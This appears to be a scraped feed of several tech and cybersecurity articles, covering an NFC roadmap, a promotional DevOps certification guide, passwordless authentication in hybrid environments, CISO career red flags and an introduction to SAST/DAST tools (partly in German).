Security enhancements are another major focus, with plans to publish the first NFC Controllers Security Profile, establishing baseline security requirements for NFC hardware. The roadmap includes work toward future-proofing NFC protocols against post-quantum computing threats and strengthening protection against relay-based attacks.
Digital keys remain an active area of development as well, with plans to explore new digital key experiences to support a wider range of industry requirements.
The NFC Forum last published a technology roadmap in 2023, with several goals delivered as part of NFC Release 15 in June 2025.
Last year, Apple expanded its use of NFC notably by rolling out Tap to Pay on iPhone in many new countries, allowing merchants to accept contactless payments directly on an iPhone without additional hardware using the device's NFC capabilities. At the same time, under the European Union's regulatory regime, Apple continued to open broader third-party access to the iPhone's NFC chip so that third-party developers can use NFC for contactless transactions, enabling Apple Pay competitors such as Curve and PayPal to offer NFC-based payment options on iOS in Europe.Tag: NFC
This article, "New Roadmap Outlines What's Next for NFC on iPhone" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 28 views
-
In this guide, we will discuss everything you need to know about the Certified DevOps Architect certification, the necessary skills, preparation plans, common mistakes, and how this can elevate your career.
What is a Certified DevOps Architect?
The Certified DevOps Architect (CDA) certification is designed for professionals who want to master the art of designing DevOps solutions that drive automation, scalability, and efficiency across development and operations. The certification focuses on leveraging cloud platforms, infrastructure as code (IaC), CI/CD pipelines, and security integration (DevSecOps) to build comprehensive DevOps architectures.
About the Certification
The Certified DevOps Architect is a high-level program that proves you have the skills to lead a company’s technical strategy. It is not just about learning one tool like Jenkins or Docker; it is about knowing how to connect 40 or 50 different tools into one smooth, safe system.
Deep Dive into the Certified DevOps Architect Certification
If you want to move into a leadership role or earn a higher salary in India or abroad, this is the track for you. Here is everything you need to know about this specific certification.
What it is
The Certified DevOps Architect (CDA) is an advanced credential. It focuses on large-scale systems, multi-cloud designs, and “Infrastructure as Code.” It proves you can design a system that never fails, even when thousands of people are using it at once.
Who Should Take the Certified DevOps Architect Certification?
This certification is ideal for professionals who already have experience in DevOps practices and are looking to specialize in designing DevOps solutions for large-scale systems. Ideal candidates include:
DevOps Engineers looking to specialize in architectural design and complex system management. Cloud Engineers who want to integrate DevOps practices with cloud infrastructure. Platform Engineers interested in automation, CI/CD, and container orchestration. Engineering Managers aiming to lead DevOps transformations and guide teams in scaling DevOps practices. Skills you’ll gain
The Certified DevOps Architect certification equips you with the following skills:
Designing scalable, automated CI/CD pipelines for continuous integration and delivery. Implementing infrastructure as code (IaC) with tools like Terraform, CloudFormation, and Ansible. Building and managing cloud-native infrastructures using platforms like AWS, Azure, and Google Cloud. Optimizing performance and securing infrastructure with DevSecOps practices. Automating deployment and monitoring with tools like Kubernetes, Jenkins, Docker, and Prometheus. Understanding cloud security integration to make DevOps practices secure and compliant. Real-World Projects You Should Be Able to Do After It
After earning the Certified DevOps Architect certification, you will be able to work on several real-world projects, such as:
Designing and deploying CI/CD pipelines for large applications. Automating cloud infrastructure provisioning with tools like Terraform and Ansible. Building containerized applications using Docker and managing orchestration with Kubernetes. Creating and implementing security policies throughout the DevOps pipeline using DevSecOps strategies. Designing fault-tolerant, scalable, and secure cloud-native applications. Optimizing infrastructure cost management using cloud cost management strategies (FinOps). Preparation Plan
7–14 Days: Best for veterans. Review the core concepts of IaC, Kubernetes, and Cloud security. Focus on the exam format. 30 Days: The standard path. Spend 1-2 hours a day going through the 46 tools covered in the program. Complete the hands-on labs. 60 Days: Best for those moving from a different field. Start with Linux and Cloud basics before moving into architectural patterns. Common Mistakes
Only learning the tools: Many people learn how to run a command but don’t understand the “why” behind it. Ignoring the “Culture”: DevOps is about people working together. An architect who ignores the team’s needs will fail. Over-complicating: Sometimes the simplest solution is the best. Don’t use 10 tools when 2 will do. Best Next Certifications After This
Once you complete your Certified DevOps Architect certification, consider pursuing the following certifications:
1. Same Track:
Certified DevOps Professional (CDP) – This is the next level of certification focusing on advanced DevOps skills and expertise. 2. Cross-Track:
Certified Kubernetes Administrator (CKA) – Specialize further in Kubernetes, the container orchestration tool used extensively in DevOps. 3. Leadership:
Certified Cloud Security Professional (CCSP) – Focus on cloud security, which is critical for DevOps professionals working with cloud platforms.
Master Certification Comparison Table
To help you see where the Architect role fits, here is a comparison of the key certifications in the “Ops” world.
TrackLevelWho it’s forPrerequisitesSkills CoveredRecommended OrderDevOpsAdvancedSenior Engineers5+ years ExpIaC, CI/CD, Design1st (Core)DevSecOpsSpecialistSecurity LeadsBasic DevOpsVault, Falco, Scanning2nd (Special)SRESpecialistReliability LeadsCoding + LinuxSLOs, Error Budgets2nd (Scale)MLOpsSpecialistML EngineersPython + DevOpsML Pipelines, Data3rd (AI)DataOpsSpecialistData EngineersSQL + CloudData Pipelines, Git3rd (Data)FinOpsManagementManagers/ArchitectsCloud BasicsCost Governance3rd (Business) Choose Your Path: 6 Specialized Learning Paths
As a mentor, I tell my students that you cannot learn everything at once. You must pick a path that matches your career goal.
DevOps Path: This is the foundation. It focuses on the flow from code to production. You learn how to make things move fast and without errors. DevSecOps Path: This is for those who love security. You learn how to put security checks into the automated pipeline so that hackers can’t find holes in your code. SRE Path: This is about reliability. If you want to work for companies like Google or Netflix, you need to know how to keep systems running 99.99% of the time. AIOps/MLOps Path: This is the newest path. It uses AI to manage IT systems and automates the life of machine learning models. It is the future of the industry. DataOps Path: This path applies DevOps ideas to data. It ensures that the data used by big companies is clean, safe, and delivered fast to the people who need it. FinOps Path: This path is about the money. You learn how to read cloud bills and design systems that use the least amount of money while giving the most value. Role → Recommended Certifications Mapping
Depending on what your job title is today, here is what you should aim for:
DevOps Engineer: Aim for Certified DevOps Architect to move into senior leadership. SRE: Go for Certified Site Reliability Architect to master large-scale reliability. Platform Engineer: Focus on CKA (Kubernetes) followed by Certified DevOps Architect. Cloud Engineer: Start with cloud-specific certs (AWS/Azure) and then take Certified DevOps Architect. Security Engineer: Your best path is Certified DevSecOps Professional. Data Engineer: Look into DataOps Certified Engineer (CDOE). FinOps Practitioner: Take the Certified FinOps Professional to master cloud costs. Engineering Manager: Take Certified DevOps Architect to speak the same language as your technical leads. Top Institutions for Training & Certification
Finding the right place to learn is just as important as the certificate itself. Here are the top institutions that provide help for the Certified DevOps Architect (CDE):
DevOpsSchool: This is a global leader in the DevOps space. They are famous for their hands-on training and their focus on real-world projects. They provide a massive library of videos and live sessions led by experts like Rajesh Kumar. Cotocus: This institution focuses heavily on corporate and specialized training. If you are looking for niche skills in specific cloud platforms or advanced containerization, Cotocus is a strong choice with a professional focus. Scmgalaxy: A very technical platform that excels in “Source Code Management” and Build/Release engineering. They are great for those who want to understand the deep mechanics of how code turns into a finished product. BestDevOps: They specialize in making complex topics simple. Their courses are designed around practical scenarios that you will actually face in a real job, making them a favorite for career changers. devsecopsschool: As the name suggests, this is the place for security-first DevOps. They offer specialized programs that teach you how to integrate security into every single step of the software lifecycle. sreschool: This portal is dedicated entirely to Site Reliability Engineering. They focus on the high-end scalability and uptime skills required by the world’s biggest tech companies. aiopsschool: If you want to enter the world of AI-driven operations, this is your home. They provide the most up-to-date training on using machine learning to improve IT performance. dataopsschool: They bridge the gap between data science and operations. This institution is perfect for data engineers who want to adopt the speed and reliability of DevOps. finopsschool: This school is all about the business side of the cloud. They teach engineers and managers how to control costs and ensure that cloud spending is helping the business grow. Next Certifications to Take
Once you have completed your Architect certification, you should not stop. Based on data from experts at Gurukul Galaxy, here are your three best options for your next move:
Same Track (The Expert Move): Master in DevOps Engineering (MDE). This is the highest level of training available. It covers everything from the basics to the most advanced architecture patterns. Cross-Track (The Multi-Skilled Move): Certified DevSecOps Professional. In today’s world, an architect who doesn’t understand security is at a disadvantage. Adding this will make you a “Security-Aware Architect.” Leadership (The Management Move): Certified DevOps Manager (CDM). If you want to stop being “hands-on” and start leading entire departments, this certification focuses on the people, budget, and strategy side of DevOps. FAQs (Frequently Asked Questions)
General Career FAQs
Q1: How difficult are these certifications?
Most are intermediate to advanced. They are not meant for beginners who have never seen a line of code. They require study and, most importantly, hands-on practice.
Q2: How much time should I spend on preparation?
If you are working full-time, I recommend 30 to 60 days. This allows you to spend an hour each day without burning out.
Q3: What are the prerequisites?
For the Architect level, we recommend at least 3 years of experience in IT. You should understand the basics of Linux and how the web works.
Q4: In what sequence should I take them?
Start with a “Professional” or “Engineer” level certification. Once you feel comfortable, move to the “Architect” level. After that, pick a specialty like Security or SRE.
Q5: What is the real value of these certificates?
They act as a “filter” for HR and hiring managers. When a company sees “Certified DevOps Architect,” they know you have been vetted by experts and have completed real projects.
Q6: Will this help me get a job in India?
Yes. India has a massive demand for senior DevOps talent. Companies in Bangalore, Pune, and Gurgaon are constantly looking for architects to lead their cloud transformations.
Q7: Can I take these exams online?
Yes, most of these programs, especially those from DevOpsSchool, are fully online. You can take the training and the exam from your home.
Q8: What kind of career outcomes can I expect?
Most students move into roles like Lead DevOps Engineer, Platform Architect, or Technical Manager. Salaries for these roles are among the highest in the IT industry.
Q9: Do I need to be a pro at coding?
You don’t need to be a developer, but you must be comfortable with scripting (like Python or Bash) and reading code. DevOps is about “software defining” the infrastructure.
Q10: Is there a lot of math involved?
No. This is about logic, system design, and understanding how data flows. You don’t need advanced math.
Q11: Are these certifications recognized globally?
Yes. DevOpsSchool and its partners are recognized by MNCs around the world. The skills you learn are universal.
Q12: What if the tools change next year?
Tools like Jenkins or Docker might change, but the “Architectural Patterns” you learn—like CI/CD, IaC, and Observability—will stay the same for a long time.
FAQs on Certified DevOps Architect
Q1: What exactly does the CDA exam test?
It tests your ability to design a full ecosystem. You will be asked how to solve problems like slow deployments, security risks, and high cloud costs.
Q2: How long is the CDA exam?
The exam is usually 3 hours long. It is an online proctored test, meaning someone will watch you through your webcam to ensure fairness.
Q3: Are there any labs in the exam?
The exam focuses on multiple-choice questions that test your “situational judgment.” However, the training program includes many labs that prepare you for these questions.
Q4: What is the passing score?
Typically, you need to score 70% or higher to pass.
Q5: Can I retake the exam if I fail?
Yes. Most providers offer at least one retake, but you should check the specific policy on the DevOpsSchool website.
Q6: Does the certification expire?
Most professional certifications are valid for 2 to 3 years. This is because technology moves fast, and you need to show that your skills are still fresh.
Q7: How does this help with “Multi-Cloud”?
A major part of the CDA is learning how to design systems that work on AWS, Azure, and Google Cloud at the same time so you are not locked into one provider.
Q8: Is the CDA better than cloud-specific certs?
Cloud certs (like AWS Architect) are great for that one platform. The CDA is better for understanding the entire process of software delivery across any platform.
View the full article
- 0 comments
- 32 views
-
Der Getränke-Abfüller Romina mit Sitz in Reutlingen-Rommelsbach wurde kürzlich von einer Cyberattacke getroffen. Wie das Unternehmen auf seiner Website erklärt, sei man deshalb weder telefonisch noch per E-Mail erreichbar. Laut einem Bericht des Reutlinger General-Anzeiger steht auch die Produktion aktuell still.
Weitere Details zu dem Vorfall gibt es bisher nicht. Daher ist unklar, wie der Angriff genau abgelaufen ist. Ebenfalls ist nicht bekannt, ob Daten gestohlen wurden. Der Regionalzeitung Südwest Presse zufolge ermittelt die Polizei Reutlingen bereits in dem Fall.
Romina Mineralbrunnen beschäftigt nach eigenen Angaben 130 Mitarbeiterinnen und Mitarbeiter. 2024 hatte das Unternehmen 180,7 Millionen Füllungen verzeichnet und einen Umsatz von mehr als 40 Millionen Euro erwirtschaftet.
View the full article
- 0 comments
- 59 views
-
Most organizations I’ve worked with start this journey with romantic notions of flipping a switch and sailing into a passwordless future. What they discover instead is that achieving true passwordless authentication requires rethinking identity architecture from the ground up. It’s not about swapping one authentication method for another — it’s about fundamentally restructuring how you verify identity across every layer of your infrastructure. The transition demands careful planning, technical rigor and unwavering commitment to security principles over convenience.
Prerequisites: Building the foundation before the migration
Before we can talk about passwordless authentication, we need to address what I call the “prerequisite triangle”: cloud Kerberos trust, device registration and Conditional Access policies. Skip any one of these, and your migration will stall before it gains momentum.
Cloud Kerberos trust is the unsung hero of hybrid passwordless deployments. When I started working on my first full migration, I underestimated how critical this piece was. Traditional Kerberos assumes a managed network with domain controllers you control. Cloud Kerberos allows your cloud-based services to issue Kerberos tickets to hybrid-joined devices without requiring a domain controller on the internet. This is your bridge between on-premises and cloud identity, and it’s non-negotiable for seamless hybrid authentication. The mechanics of Kerberos itself haven’t changed significantly since its introduction in the 1980s, but extending it to cloud environments required a fundamental rethinking of how authentication tickets are issued and validated across trust boundaries.
Getting cloud Kerberos working requires Azure AD Connect to run version 2.0 or later with the cloud sync agent configured for password hash synchronization (even if you’re not using it for authentication — this remains a prerequisite). Your hybrid-joined devices need to be running Windows 10 20H2 or later, and they must have reliable network connectivity to both your on-premises domain controllers and Azure. In one deployment, my team spent two weeks troubleshooting authentication failures before discovering that a firewall rule was blocking the necessary communication on port 88. This single finding reinforced why network validation should occur before pilot rollout, not during.
Device registration and management come next. Every device attempting passwordless authentication must be either Azure AD joined, hybrid AD joined or registered with Entra ID. I’ve found that hybrid-joined devices work best in truly hybrid environments because they maintain connection to on-premises infrastructure while gaining cloud identity benefits. Your Intune Mobile Device Management deployment becomes critical here — devices must be compliant with your policies before they’re trusted for passwordless sign-in. This means ensuring that disk encryption is enabled, that antivirus is running and that devices meet your organization’s baseline security posture. The compliance baseline isn’t punitive; it’s the minimum acceptable security threshold.
Conditional Access policies form the final leg of the prerequisite triangle. These aren’t optional — they’re how you enforce the “trust zero, verify always” principle of Zero Trust. The National Institute of Standards and Technology defines Zero Trust architecture as requiring continuous verification and explicit access grants based on all available data points. I configure policies that require device compliance, enforce multi-factor authentication for sensitive operations, and block legacy authentication entirely. The policy I typically recommend as a starting point requires hybrid-joined devices, compliant Intune status and MFA for all access to on-premises resources, while allowing seamless sign-in for fully compliant devices. This creates a virtuous cycle where security and user experience reinforce each other.
Architecture decisions: Hybrid authentication flows and Windows Hello for Business
Once your prerequisites are in place, you face critical architectural decisions that will shape your deployment for years to come. The primary decision point is whether to use Windows Hello for Business, FIDO2 security keys or phone sign-in as your primary authentication mechanism.
In my experience, Windows Hello for Business is the foundation for hybrid environments. It leverages biometric or PIN authentication on the device itself, preventing credentials from ever being transmitted across the network. When a user signs in with Windows Hello, they’re not sending a password or even a credential — they’re using a private key stored in the device’s Trusted Platform Module (TPM) to prove their identity. For hybrid-joined devices, this works seamlessly because the device can authenticate both to your on-premises domain controller (using cloud Kerberos) and to Entra ID in a single operation. This eliminates the attack surface that traditional password-based authentication creates. Organizations seeking more information on passwordless authentication approaches can review guidance from the Cybersecurity and Infrastructure Security Agency, which has published extensive recommendations on moving beyond passwords.
However — and this is crucial — not all devices have TPM 2.0, which is required for the most secure implementations. In one organization where we deployed to 15,000 devices, we discovered that 12% didn’t meet hardware requirements. We ended up implementing a phased approach: Windows Hello for Business on compliant devices, with FIDO2 security keys as the backup for devices that couldn’t support it. FIDO2 keys, which conform to the open FIDO2 standard, are also your answer for scenarios where you need physical authentication tokens — particularly useful for privileged accounts or high-risk scenarios. They’re resistant to phishing and account takeover because possession of the physical token is required. Research from the Identity Defined Security Alliance has shown that organizations using FIDO2-compliant authenticators reduce account compromise incidents by over 90% compared to password-dependent systems.
The architectural decision also includes determining how you handle legacy applications that still require passwords. Your options are limited: implement a passwordless-compatible application gateway, deprecate the application entirely or use Entra ID’s smart lockout and password protection features to reduce risk while you transition. I typically recommend treating legacy application support as a temporary bridge, not a permanent architecture. Organizations that treat this as permanent inevitably find themselves maintaining password infrastructure indefinitely, undermining the entire security posture you’re building.
Migration workflows: The step-by-step reality
The migration itself needs to follow a structured approach that I’ve refined across multiple organizations. Start with a pilot group — I recommend between 50 and 200 users who are willing to accept some friction in exchange for security improvements. This group should include IT staff and security-conscious users who can provide meaningful feedback without becoming frustrated with early-stage issues.
For the pilot phase, configure Windows Hello for Business using Group Policy on your on-premises infrastructure for domain-joined devices, while using Intune policies for cloud-managed devices. Configure Entra ID to require Windows Hello as the preferred authentication method. During this phase, maintain traditional password authentication as a fallback — not because you lack confidence, but because user trust in the system matters. I typically see a three to four week period where you’re supporting both methods while users adapt. This period provides invaluable data about real-world usage patterns and edge cases.
The second phase involves expanding to department-level groups. At this point, you should have identified and documented all the troubleshooting patterns that emerged in your pilot. Common issues I’ve encountered include PIN complexity policies that conflict with Windows Hello configuration, credential caching issues on hybrid-joined devices and confusion around how to recover access when a device is lost or compromised. A well-designed help desk knowledge base at this stage prevents the third phase from becoming a support crisis.
The final phase is organization-wide rollout with password authentication disabled. This is where you must have complete confidence in your fallback mechanisms and your support team’s ability to handle edge cases. I recommend maintaining password authentication for break-glass scenarios (though heavily restricted and logged) for at least 90 days after full rollout. This safety net provides psychological comfort to leadership and creates a genuine escape hatch if something unexpected occurs at scale.
Troubleshooting patterns and lessons learned
After guiding three large-scale deployments, I’ve compiled a list of issues that deserve attention before they become production problems rather than documented solutions.
Device compliance checking often becomes a bottleneck. If your Intune policies are too strict, you’ll have users locked out of passwordless authentication because their devices are non-compliant. The solution isn’t to loosen policies — it’s to automate compliance remediation. Use Intune’s remediation scripts to automatically enable required features and update settings rather than blocking access. When a device becomes non-compliant due to a missing security update, remediation scripts can deploy that update silently, restoring access without support interaction.
Cloud Kerberos ticket refresh failures occur when devices lose network connectivity. I’ve found that users appreciate understanding that brief network outages might require them to use an alternative authentication method temporarily. Documenting this expectation and providing clear error messages reduces support burden significantly. One organization I worked with created a simple status dashboard showing cloud connectivity health, which dramatically improved user confidence in the system.
The Windows Hello PIN reset flow needs careful planning. Users will forget PINs — not because they’re careless, but because they now have one less password to remember and are redirecting that cognitive effort elsewhere. Implement Entra ID’s self-service PIN reset capability, but test it thoroughly in various network conditions. I discovered in one deployment that users couldn’t reset their PIN while offline, which created support tickets even though the feature was technically available online. A simple offline reset option would have eliminated those tickets.
Recovery mechanisms deserve special attention. What happens when a user’s device is stolen? What if the TPM fails? What if they forget their PIN and can’t reach your self-service portal? Document these scenarios and test them with your help desk before full rollout. I’ve found that help desk confidence in recovery procedures directly correlates with user confidence in passwordless authentication.
The endpoint: A genuinely passwordless enterprise
Reaching true passwordless authentication in a hybrid environment means accepting that you’re building a new security model, not just changing how users authenticate. The effort required is substantial, but the security improvement is profound. I’ve watched organizations move from breach-heavy authentication scenarios to Zero Trust architectures where every access request is evaluated in context, and where the compromise of a single device doesn’t cascade into wholesale account takeover.
The passwordless journey isn’t a destination you reach in months — it’s a direction you move in consistently. The organizations that succeed view passwordless migration not as a project with an end date, but as a fundamental shift in how they think about identity and trust. They maintain that momentum by continuously updating policies, expanding coverage to new applications and use cases, and refining their architecture as technology evolves.
The view from the other side is worth the journey. Once you’ve lived in a passwordless environment, going back to password-based authentication feels like removing your seatbelt during a drive. The risk seems obvious in retrospect, and the safety you’ve gained becomes non-negotiable.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
- 0 comments
- 34 views
-
- 0 comments
- 32 views
-
Identity-based attacks dominate the field, with passwords being involved in 97% of incidents tracked by Eye Security. Abuse of legitimate accounts is a primary cause of cloud security incidents and drives the business of initial access brokers.
However, the study’s results show that attackers’ fundamental methods remain unchanged. “Even in 2026, compromise will still begin with phishing, exploiting misconfigured or vulnerable internet-enabled systems, social engineering, or attacks via the software supply chain,” explains Lodi Hensen, VP of security operations at Eye Security.
BEC attacks are particularly common
Business email compromise (BEC) is the most common form of attack, according to the study: More than 70% of incidents fall into this category. In 40% of these cases, phishing served as the initial point of entry. Analysts say that BEC attacks can remain undetected for weeks without continuous monitoring.
Furthermore, the study highlights that ransomware remains one of the biggest threats. “The proliferation of Ransomware-as-a-Service (RaaS), BuilderLeaks, and access broker marketplaces has lowered the barriers to entry and created a professional ecosystem,” the authors explain.
The report reveals a dangerous trend: the commercialization of insider knowledge. “Groups like ShinyHunters are actively recruiting employees to buy access credentials. This blurs the line between external attacks and insider threats,” the security researchers explain. “For ransomware actors, this purchased access is often faster and more reliable than technical hacking.”
Companies in the industrial, construction, and transport and logistics sectors are particularly affected. Many ransomware attackers exploit everyday vulnerabilities: unprotected applications, insecure remote access, or phishing emails through which employees unknowingly disclose login credentials. The analysis evaluated a total of 630 security incidents in Europe from 2023 to 2025.
View the full article
- 0 comments
- 56 views
-
- 0 comments
- 52 views
-
In the big picture, CISO roles are hard, and so the majority of CISOs switch jobs every two to three years or less. Lack of support from senior leadership and lack of budget commensurate with the organization’s size and industry are top reasons for this CISO churn, according to The life and times of cybersecurity professionals report from the ISSA.
More specifically, CISOs leave on account of limited board engagement, high accountability with insufficient authority, executive misalignment, and ongoing barriers to implementing risk management and resilience, according to an ISSA spokesperson.
Many of these roadblocks are common across industries, so how does a CISO know when it’s time to move on?
They look for the flags.
Red flag: Playing lip service
A common red flag and reason CISO’s leave their jobs is because leadership is paying “lip service” to auditors, customers and competitors, says FinTech CISO Marius Poskus, a popular blogger on security leadership who posted an essay about resigning from “security‑theater roles.”
So, even before signing onto a new job, Poskus suggests looking for recent events proceeding the organization hiring its first-ever CISO. “I see this often. Usually after an impactful breach, they negotiate fines down by saying they’ll hire their first CISO. In fact, a friend in New Zealand reached out to me today with just such a story,” he tells CSO.
Other indicators that executives are playing lip service to security include constant resource denials, lack of risk ownership, and failure to sign off on identified risks at the top level, leaving the CISO vulnerable. To this end, Poskus shared a security executive charter that outlines responsibilities of senior executives’ accountability around the cybersecurity program.
And, since lack of access to the board is a top-cited reason for leaving, Poskus says to look for problematic reporting lines that block access to executives, such as through a boss who refuses to report issues and requests to executives.
Red flag: Cognitive disconnect
Lack of access to executives and the board comes up repeatedly in Cybersecurity Ventures reports as a top reason CISO’s decide to leave their jobs, according to Steve Morgan, founder of Cybersecurity Ventures. He cites lack of support as another top reason CISO’s leave.
Splunk’s 2025 CISO report found 29% of respondents had adequate budget compared to 41% of boards who felt cybersecurity budgets were adequate.
This cognitive disconnect was clear in Nawab Kabir’s case. He declined on the prospect of taking a full-time CISO role to become a fractional CISO after a merger left him reporting to an IT director rather than the CEO as he previously had reported to. “One of the key red flags for CISO’s is if their boss, usually the CIO or CTO, repeatedly blocks attempts to escalate missions to the CEO by downplaying the real risk, asking the CISO to accept that risk, and saying that the CEO simply doesn’t care. So, the risk never gets mentioned in executive leadership meetings,” Kabir says.
After the merger, the initiatives and intervention strategies he developed never got past the director of IT (who came from the merger) to executive leadership. So, Kabir knew it was time to leave. “That’s one of the reasons I became a fractional cybersecurity leader, which I love because now I’m being hired to make a difference at my client companies.”
Red Flag: Pushing ethical boundaries
Above all these, the biggest red flag is when leadership pushes against your professional and personal ethics. For example, when a CEO or board wants to conceal compliance gaps, cover up reportable breaches, and refuse to sign off on responsibility for gaps and reporting failures they’ve been made aware of. “This happens more often than we know because most CISOs won’t make public what happened behind the scenes that made them quit, especially when they’re looking for new jobs,” Poskus explains. “Your integrity is your most important asset, so that’s the biggest red flag when we talk about leaving a role rather than staying and fighting.”
In these types of scenarios, the CISO likely lacks critical allies within the organization. Acknowledge this sense of vulnerability, Poskus advises, because it’s a huge red flag. Human resources and legal teams in these situations won’t help because they owe their loyalty to the business, he adds.
Such was the case with former Uber CISO Joe Sullivan who was thrown under the bus by Uber’s shady leadership after a 2016 breach. In contrast, SolarWinds CISO Tim Brown felt fully supported after a historic supply chain hack in 2020 spread to 18,000 business clients through its Orion network management product patch update system.
“Joe was in such a difficult situation. The company was aggressive towards him, which was so different from my experience at SolarWinds,” says Brown, who had responded to the breach.
Green flag: They have your back
In contrast to Sullivan’s employer, Brown shares that everyone involved in responding to the SolarWinds breach — from IT responders to communications, legal, and executives — felt the same way he did in terms of making things right for clients and regulators. “My situation was difficult, but manageable in many ways because of that support from my team. From day one, we had no question about doing the right thing. We decided on transparency to our customers all the way through the SEC filings,” Brown explains.
Even as a new CEO came onboard under a planned transition shortly after the breach, and as the SEC charged SolarWinds and Brown with fraud for certifying compliance with SolarWinds security shortly before the sophisticated supply-chain hack occurred, Brown has felt ongoing support.
Given his access to the board and CEO, Brown knew well before the breach that the company had his back. He also points to another green flag: The company’s commitment to tabletop exercises of impactful breaches. Throughout the practice scenarios, teams worked together under a customer-centric mandate that advocated transparency and education, the same playbook that they followed in the 2020 breach.
Ultimately, the SEC dropped its charges against Brown, and in November, he attended a virtual toast in his honor to celebrate the SEC dropping the case against him “without prejudice.” More than 200 CISOs of top companies joined, including co-host Joe Sullivan. Ultimately, as Brown had hoped, the entire experience provided teachable moments to help push the CISO role up the maturity curve.
Changing internal mindsets
As CISOs burn out or leave under stressful circumstances, many turn to fractional work as Kabir has. And, in his case, working with new clients gives him plenty of opportunities to turn red flags into green flags.
For example, he points to lack of board access and resources. In many cases he steps into, the former cybersecurity leaders didn’t understand the business and talked technically over their executives’ heads. As a result, he’s had to convert fatigued, resistant executive teams that don’t want to repeat those experiences with a new cybersecurity leader.
For these clients, he likes to call “all hands” to a meeting and conduct what he calls interactive “business continuity stress tests” in table-top scenarios that impact a revenue-generating activity. “Take manufacturing, if this machine is down for six to eight hours what would be our revenue costs associated with this downtime? That gets attention,” Kabir says. “Then finance starts talking within their teams and it goes beyond that to the CEO because now it’s seen as a business issue.”
CISOs, then, can change culture to turn a red flag into a green flag. But knowing when and how to do so depends on the indicators mentioned. Even with a fractional role, CISOs should still expect some of their clients to try and compromise ethics by covering up findings for example. Fortunately, that red flag usually reveals itself early in the audit, when the executives and business units appear afraid to answer questions as if trying to hide something.
“A lot of red flags have to do with lack of security culture or mismatch in understanding the risk tolerance of the company and what the actual risks are. This red flag goes beyond: If they don’t want to be questioned about what they’ve done so far, that is a huge red flag that they’re covering something up,” Kabir explains.
To be safe, he carries indemnity insurance and retains his own legal counsel — as should all CISO’s with large enough salaries who are reporting to the board and C-suite. Because, as in the case with Joe Sullivan and many other examples that go unreported, CISO’s can’t count on their organizations to have their backs legally or professionally should the big one hit — especially if those executives, by virtue of their unresponsiveness and lack of support, are the cause of it.
View the full article
- 0 comments
- 33 views
-
- 0 comments
- 48 views
-
- 0 comments
- 38 views
-
Die Softwarelieferkette – respektive ihre Schwachstellen – haben in den vergangenen Jahren für viel Wirbel gesorgt. Ein besonders schlagzeilenträchtiges Beispiel ist der Angriff auf den IT-Dienstleister SolarWinds, bei dem mehr als 18.000 Kundenunternehmen betroffen waren. Zwar war die Attacke beileibe nicht die einzige auf Softwarelieferketten – sie führte jedoch zu einer Neubewertung der Frage, wer dafür verantwortlich zeichnet.
Eine Reaktion auf den SolarWinds-Angriff war beispielsweise Ex-US-Präsident Bidens “Executive Order on Improving the Nation’s Cybersecurity“. Der Erlaß hob nicht nur hervor, wie bedeutsam die Absicherung der Lieferketten ist, sondern stellt auch ausdrücklich die Verantwortung der Entwickler heraus, wenn es darum geht, sichere Software zu liefern. Zwar gilt die Anordnung ausschließlich für US-Regierungsbehörden und deren Geschäftspartner. Sie steht jedoch stellvertretend dafür, dass alle beteiligten Organisationen ihre Softwareanbieter überprüfen müssen, um sicheren Code bereitzustellen – unabhängig davon, ob ein Unternehmen nur Programme und Anwendungen für sich selbst entwickelt oder Teil der Softwarelieferkette Dritter ist.
Das größte Problem dabei: Softwareentwickler wurden viele Jahre lang nahezu ausschließlich danach beurteilt, wie schnell sie programmieren können. Security war dabei entweder ein nachgelagerter Gedanke oder der Verantwortungsbereich Anderer. Zwar bilden sich viele Entwickler inzwischen in Sachen Cybersecurity fort, sie brauchen jedoch Hilfe, um sicherzustellen, dass ihr Code frei von Sicherheitslücken ist. Dazu können Tools für Dynamic Application Security Testing (DAST) und Static Application Security Testing (SAST) einen wertvollen Beitrag leisten.
DAST- & SAST-Tools – was ist das?
Es ist nicht überraschend, dass sowohl SAST- als auch DAST-Tools in Zusammenhang mit der Absicherung von Softwarelieferketten wieder an Bedeutung gewinnen. Schließlich geben sie den Entwicklern die Werkzeuge an die Hand, um sicheren Code bereitzustellen – entweder als Teil eines offiziellen DevSecOps-Programms oder um die Verantwortung für die Security näher an den Ort der Anwendungsentwicklung zu verlagern. Sowohl SAST- als auch DAST-Tools haben das Ziel, den Code sicherer zu machen. Im Idealfall geschieht das lange bevor eine Anwendung in eine Produktionsumgebung gelangt und Teil der Softwarelieferkette wird. Dabei verfolgen die Tools dasselbe Ziel, gehen das Problem aber aus unterschiedlichen Blickwinkeln an:
SAST-Tools analysieren den Quellcode von Programmen und Anwendungen, die sich noch in der Entwicklung befinden. Sie lassen sich in eine CI/CD-Pipeline integrieren oder so konfigurieren, dass sie automatisch aktiv werden, wenn ein Entwickler eine Pull-Anfrage stellt. So können Tools für Static Application Security Testing sicherstellen, dass mit neuen Änderungen an einer Anwendung nicht unbeabsichtigt Schwachstellen hinzugefügt werden oder anderweitige Fehler entstehen. Einige SAST-Tools können auch Teil integrierter Entwicklungsumgebungen (IDE) werden. In diesem Fall warnt die Plattform die Entwickler während der Programmierarbeit vor Fehlern – ähnlich wie eine moderne Textverarbeitung mit Rechtschreibprüfung.
DAST-Tools werden im Gegensatz dazu eingesetzt, nachdem eine Applikation kompiliert ist. Ein Tool für Dynamic Application Security Testing ist weniger dazu gedacht, Schwachstellen im Code aufzudecken (die ein SAST Tool im Idealfall bereits beseitigt hat), sondern fungiert als externer Tester, der versucht, ein Programm beispielsweise über offene http- oder HTML-Schnittstellen zu hacken. Einige DAST-Tools können auch konfiguriert werden, um nach Schwachstellen für gängige Angriffe in bestimmten Branchen wie dem Finanzwesen oder dem Einzelhandel zu suchen.
Wegen der genannten Unterschiede müssen SAST-Tools die von Ihnen gewählte Programmiersprache unterstützen. Das Gros der DAST-Tools erfordert das nicht, obwohl diese Tools unter Umständen auch mit Quellcode arbeiten können, um Probleme zu lokalisieren. Während einige Unternehmen entweder ausschließlich ein DAST- oder ein SAST-Tool verwenden, empfiehlt es sich, eine Kombination aus beiden einzusetzen oder mit einem Tool zu arbeiten, das beide Komponenten enthält. Unternehmen, die das tun, sind in der Lage, ihre Applikationen besser zu schützen, was der Sicherheit der Softwarelieferkette insgesamt zuträglich ist.
Dynamic Application Security Testing Tools: Top 4
Im Folgenden finden Sie einige der wichtigsten DAST- und SAST-Tools, die heute zum Einsatz kommen.
1. Acunetix DAST
